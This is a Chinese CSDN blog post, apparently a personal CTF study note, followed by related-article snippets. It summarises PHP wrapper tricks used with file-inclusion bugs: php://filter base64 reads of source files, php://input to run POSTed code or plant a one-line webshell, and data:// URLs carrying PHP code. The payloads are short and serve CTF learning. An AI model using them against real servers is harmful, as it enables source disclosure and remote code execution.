php伪协议利用の总结

最新推荐文章于 2023-05-20 15:53:02 发布
最新推荐文章于 2023-05-20 15:53:02 发布
阅读量213 收藏 2
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/New_Ss_/article/details/113574103
版权

ctf比赛中经常会出现例用伪协议的web类题目,近期在进行rce刚好总结一下。

flie://

用来访问本地的文件,只能传入绝对路径(一步到底的文件)

?file=file://

?flie=./phpinfo.txt

 

php://

php://filter

?cmd=php://filter/read=convert.base64-encode/resource=[文件名]

将内容代码以base64输出

 

 

php://input

构造之后用post直接传输代码即可,例用hackerbar或者Burpsuit

有权限可以写入一句话木马

 

data://

 

?file=data://text/plain,<?php phpinfo();?>

data:text/plain;base64,代码的base64内容(注意+=需要受用转换)

 

http://&https://

?file=http://127.0.0.1/phpinfo.txt

Hbhoo
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
ctf中常用的PHP伪协议
weixin_35756637的博客
01-02 711
在CTF比赛中,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: data: 协议 这种形式的PHP伪协议通常用于在HTML中嵌入PHP代码,例如: <imgsrc="data:image/png;base64,PHP_CODE_HERE"> php: 协议 这种形式的PHP伪协议通常用于在浏览器中执行PHP代码,例如:...
ctf-试试协议吧(PHP伪协议
qq_29566629的博客
02-10 701
在ctf中经常用到伪协议,其使用的先决条件如下: allow_url_fopen和allow_url_include都设置为on 源代码里有include: 常用的伪协议有两种: 一、php://filter 作用是读取源码 http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php 二、php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行
CTF中常用的php伪协议总结
Y4tacker的博客
08-04 8111
文章目录总览file://php://php://filterphp://inputdata://参考文章 总览 php:// — 访问各个输入/输出流(I/O streams) file:// — 访问本地文件系统 phar:// — PHP 归档 zlib:// — 压缩流 data:// — 数据(RFC 2397) http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs glob:// — 查找匹配的文件路径模式 ssh2:// — Secure Shell
PHPRCE
m0_63045593的博客
04-22 947
PHPRCE <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store
php为协议 ctf,CTF中常用的php伪协议总结
weixin_42533910的博客
04-02 601
php:// — 访问各个输入/输出流(I/O streams)file:// — 访问本地文件系统phar:// — PHP 归档zlib:// — 压缩流data:// — 数据(RFC 2397)http:// — 访问 HTTP(s) 网址ftp:// — 访问 FTP(s) URLsglob:// — 查找匹配的文件路径模式ssh2:// — Secure Shell 2rar:// —...
php伪协议.zipphp伪协议.zip
02-24
这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现一些特定的功能,比如日志记录、数据处理或调试。 总之,PHP伪协议是一种强大的工具,但也带来了一定的安全隐患。在开发过程中,理解其工作...
什么是php伪协议,并举例说明
最新发布
02-25
PHP伪协议PHP中一种特殊的机制,它允许开发者在PHP代码中通过特定的字符串格式来访问和处理非标准的数据源,这些数据源可能不是实际的网络协议,而是PHP内部或者自定义的数据接口。PHP伪协议的使用极大地扩展了PHP...
j7ur8#WebBook#伪协议文件包含1
07-25
伪协议参考利用条件filter的过滤器有很多。
基于PHP的SK百度知道伪静态缓存极速版 php版.zip
07-22
标题中的“基于PHP的SK百度知道伪静态缓存极速版”揭示了这是一个使用PHP编程语言开发的软件,其主要功能是实现对百度知道网站的伪静态处理和高速缓存。在互联网开发中,伪静态技术是为了提高搜索引擎优化(SEO)和...
基于PHP的SK百度知道抓取伪静态缓存极速版php版源码.zip
08-28
这个系统的核心理念是利用PHP抓取百度知道平台上的信息,并将其存储在本地,形成一种静态化的数据缓存,从而避免每次用户请求时都需要实时从远程服务器获取数据,减少了网络延迟,提高了网页加载速度。 首先,我们...
ctf文件包含+伪协议总结
limenzzz的博客
09-08 2304
基本原理
ctf之php伪协议的使用
一只菜鸟呀的博客
05-20 1181
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。当它与包含函数结合时,php://filter流会被当作php文件执行。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。
【CTF】ctf中用到的php伪协议总结及例题(持续更)
weixin_52450702的博客
02-03 2918
ctf中用到的php伪协议总结及例题
配合php伪协议利用文件包含漏洞
超人学飞的日子
06-06 9203
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
CTF中遇见的PHP伪协议运用
热门推荐
byxs007的博客
12-15 1万+
关于PHP伪协议中的总结网上已经有很多文章了 LoRexxar的PHP伪协议总结 PHP伪协议 官方文档 以下都是在做CTF题目的时候遇见的一些知识点,每遇到一点就会在这面做一些总结 php://input php://input 是个可以访问请求的原始数据的只读流。因为它不依赖于特定的 php.ini 指令。 注:enctype=”multipart/form-d
浅析PHP伪协议在CTF的应用
weixin_33725239的博客
11-22 466
PHP支持的伪协议如下: file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — 查找匹配的文件路径模式 phar:// — PHP 归档 ...
PHP伪协议总结
weixin_40950781的博客
09-11 533
PHP伪协议总结0x00 file:// 协议0x01 PHP://协议0x02 zip:// & bzip2:// & zlib:// 协议0x04 data://协议0x05 http:// 和 https://协议0x06 phar://协议 本文主要对PHP伪协议进行总结,重点不再放在操作上,操作实例请看:https://blog.csdn.net/weixin_40950...
一个关于本地包含和PHP伪协议的CTF题(Bugku——flag在index里)
weixin_44377940的博客
04-14 1341
在点开题目链接,查看源代码之后,我们看到这个界面: 这看起来没什么,我们点击链接之后,发现它的URL发生了变化: 看到file,即想到了本地文件包含漏洞。 根据题目flag在index里,但index文件并没有flag,因为PHP代码是后端解析实现,不会在前端显示代码,所以返回的是运行结果。于是想到我们可以使用PHP伪协议来读取隐藏的内容,关于PHP伪协议的内容,可以参照PHP手册相关内容(可...
CTF 文件包含与伪协议
weixin_30810583的博客
11-06 864
正巧在写代码审计的文章,无意间看到了一篇CTF的代码审计,CTF题目很好,用的姿势正如标题,文件包含和伪协议。 先放出原文链接(http://www.freebuf.com/column/150028.html) 题目源自国外某挑战平台,平台上还有许多其他有趣的challenges题目。 站点地址:http://chall.tasteless.eu/ 这次的题目链接:http://leve...
php://input伪协议详解
07-30
引用[1]中提到,php://input是一种伪协议,用于从请求的主体中获取原始数据。然而,根据引用[1]的描述,如果服务器的allow_url_include设置为off,则无法使用php://input伪协议。这意味着无法通过该伪协议来执行任意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值